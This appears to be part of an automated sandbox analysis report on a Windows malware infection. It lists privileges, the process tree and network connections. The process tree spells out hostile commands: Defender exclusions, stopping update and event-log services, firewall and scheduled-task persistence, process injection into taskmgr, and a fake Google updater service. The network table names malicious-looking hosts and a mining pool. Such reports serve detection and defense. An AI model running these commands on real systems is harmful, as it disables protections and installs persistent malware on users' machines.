| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-H67FP.tmp\gpWNVqLsEDtZirSl0AU2v7YV.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Users\Admin\Pictures\gpWNVqLsEDtZirSl0AU2v7YV.exe
"C:\Users\Admin\Pictures\gpWNVqLsEDtZirSl0AU2v7YV.exe"
C:\Users\Admin\Pictures\Z1JYCcVn4hUQyrOX4S18vo6O.exe
"C:\Users\Admin\Pictures\Z1JYCcVn4hUQyrOX4S18vo6O.exe"
C:\Users\Admin\AppData\Local\Temp\is-H67FP.tmp\gpWNVqLsEDtZirSl0AU2v7YV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H67FP.tmp\gpWNVqLsEDtZirSl0AU2v7YV.tmp" /SL5="$80224,1697450,56832,C:\Users\Admin\Pictures\gpWNVqLsEDtZirSl0AU2v7YV.exe"
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe
"C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe"
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
C:\Users\Admin\Pictures\Opm5lGu8UrvwdUGjPjpOVyNv.exe
"C:\Users\Admin\Pictures\Opm5lGu8UrvwdUGjPjpOVyNv.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe
"C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F4C0.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\Pictures\7M1vzKcmqz14mInY2i7DMkSN.exe
"C:\Users\Admin\Pictures\7M1vzKcmqz14mInY2i7DMkSN.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Google\Chrome\updater.exe
"C:\ProgramData\Google\Chrome\updater.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\D1D3.exe
C:\Users\Admin\AppData\Local\Temp\D1D3.exe
C:\ProgramData\Google\Chrome\updater.exe
"C:\ProgramData\Google\Chrome\updater.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Users\Admin\AppData\Local\Temp\D1D3.exe
C:\Users\Admin\AppData\Local\Temp\D1D3.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\77ebaece-228d-4626-873d-85c1fcd89c02" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\D1D3.exe
"C:\Users\Admin\AppData\Local\Temp\D1D3.exe" --Admin IsNotAutoStart IsNotTask
C:\ProgramData\Google\Chrome\updater.exe
"C:\ProgramData\Google\Chrome\updater.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\D1D3.exe
"C:\Users\Admin\AppData\Local\Temp\D1D3.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 404 -ip 404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 568
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Google\Chrome\updater.exe
"C:\ProgramData\Google\Chrome\updater.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Google\Chrome\updater.exe
"C:\ProgramData\Google\Chrome\updater.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5008 -ip 5008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1980
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Google\Chrome\updater.exe
"C:\ProgramData\Google\Chrome\updater.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 188.114.96.2:443 | yip.su | tcp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| US | 8.8.8.8:53 | midnight.bestsup.su | udp |
| US | 8.8.8.8:53 | namecloudvideo.org | udp |
| US | 15.204.49.148:80 | 15.204.49.148 | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| US | 104.21.29.103:80 | midnight.bestsup.su | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| US | 188.114.96.2:443 | namecloudvideo.org | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | shipbank.org | udp |
| US | 172.67.146.202:443 | shipbank.org | tcp |
| US | 8.8.8.8:53 | 112.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.29.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.49.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.174.106.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.146.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 8.8.8.8:53 | 145.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| US | 8.8.8.8:53 | 1e701e4c-431e-4dea-a0c7-f6a6d8db5191.uuid.realupdate.ru | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 5.181.190.20.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| UY | 179.27.75.59:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | 59.75.27.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server10.realupdate.ru | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.ipfire.org | udp |
| BG | 185.82.216.96:443 | server10.realupdate.ru | tcp |
| DE | 81.3.27.44:3478 | stun.ipfire.org | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 44.27.3.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.221.67.172.in-addr.arpa | udp |
| BG | 185.82.216.96:443 | server10.realupdate.ru | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
